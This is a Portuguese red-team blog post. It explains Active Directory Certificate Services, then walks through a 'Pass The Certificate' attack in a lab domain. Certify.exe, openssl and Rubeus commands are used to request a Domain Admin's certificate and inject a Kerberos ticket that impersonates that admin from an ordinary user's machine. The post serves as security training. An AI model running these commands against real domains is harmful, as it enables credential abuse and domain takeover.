BieAnimaton

Computer Science, Cyber Security, Red Team, Hardware Hacking, CPIA, CRTA, CRTSv2, CRT-COI, CRT-ID, MITRE ATT&CK.

2 minuto(s) de leitura

Teoria

O Active Directory Certificate Services (AD CS) é um serviço da Microsoft que fornece a infraestrutura necessária para criar, gerenciar e validar certificados digitais em um ambiente corporativo. Os certificados digitais são utilizados para autenticação, assinatura digital, criptografia de dados e para assegurar a comunicação entre sistemas.

Passos para a emissão de certificado

Geração de Par de Chaves pelo Cliente

Um cliente, que pode ser um usuário ou um computador, gera um par de chaves: uma chave pública e uma chave privada. A chave pública será incluída no certificado digital, enquanto a chave privada será mantida em segredo pelo usuário. Este par de chaves é fundamental para a criptografia e a autenticação.

Envio do CSR (Certificate Signing Request)

O cliente cria uma Solicitação de Assinatura de Certificado (CSR) que inclui a chave pública e outras informações, como o nome e o propósito do certificado. O CSR é então enviado para a Autoridade Certificadora (CA) corporativa.

Validação do CSR pelo Servidor CA

O servidor CA verifica o CSR para assegurar que:

  • O certificado solicitado não existe previamente.
  • As configurações no CSR são permitidas pelo modelo de certificado.
  • O usuário tem permissão para solicitar o certificado.

Se todas as condições forem atendidas, a CA prossegue com a emissão do certificado.

Geração e Assinatura do Certificado

A CA gera um certificado digital que inclui a chave pública fornecida pelo cliente e o assina com sua própria chave privada. A assinatura da CA confirma a autenticidade e a validade do certificado.

Armazenamento e Uso do Certificado pelo Cliente

O cliente recebe o certificado digital e o armazena em seu repositório de certificados. Este certificado pode ser usado para várias finalidades, como:

  • Autenticação: Verificar a identidade do cliente em redes e sistemas.
  • Assinatura de Código: Assegurar a integridade e a autoria do código.
  • Criptografia de Dados: Proteger a confidencialidade dos dados transmitidos.
  • Comunicação Segura: Estabelecer conexões seguras via SSL/TLS.

Pass The Certificate

Demonstração de como acessar o Domain Controller através do usuário e certificado (ao invés da senha).

Requisitar certificado (máquina privilegiada)

A conta da máquina privilegiada é do Cedric Bricks (cbricks).

Certify.exe request /ca:DC01.redteam.corp\redteam-DC01-CA /template:User

Untitled

Converter para arquivo PFX

openssl.exe pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Untitled 1

Transferir o PFX para a máquina comum

A conta da máquina comum é da Monica Raybrandt (monraybrandt).

Untitled 2

Requisitar TGT

Com o nome do usuário privilegiado e o certificado em mãos, pode-se requisitar o TGT.

Rubeus.exe asktgt /user:cbricks /domain:redteam.corp /certificate:cert.pfx /ptt

Untitled 3

Untitled 4

Listar os tickets Kerberos armazenados em cache

Listando os tickets.

Untitled 5

Acessar o DC

A Mônica pode acessar as pastas e arquivos do Domain Controller pois cbricks é Domain Admin e está se passando por ele.

Untitled 6

Deixe um comentário

Talvez você também goste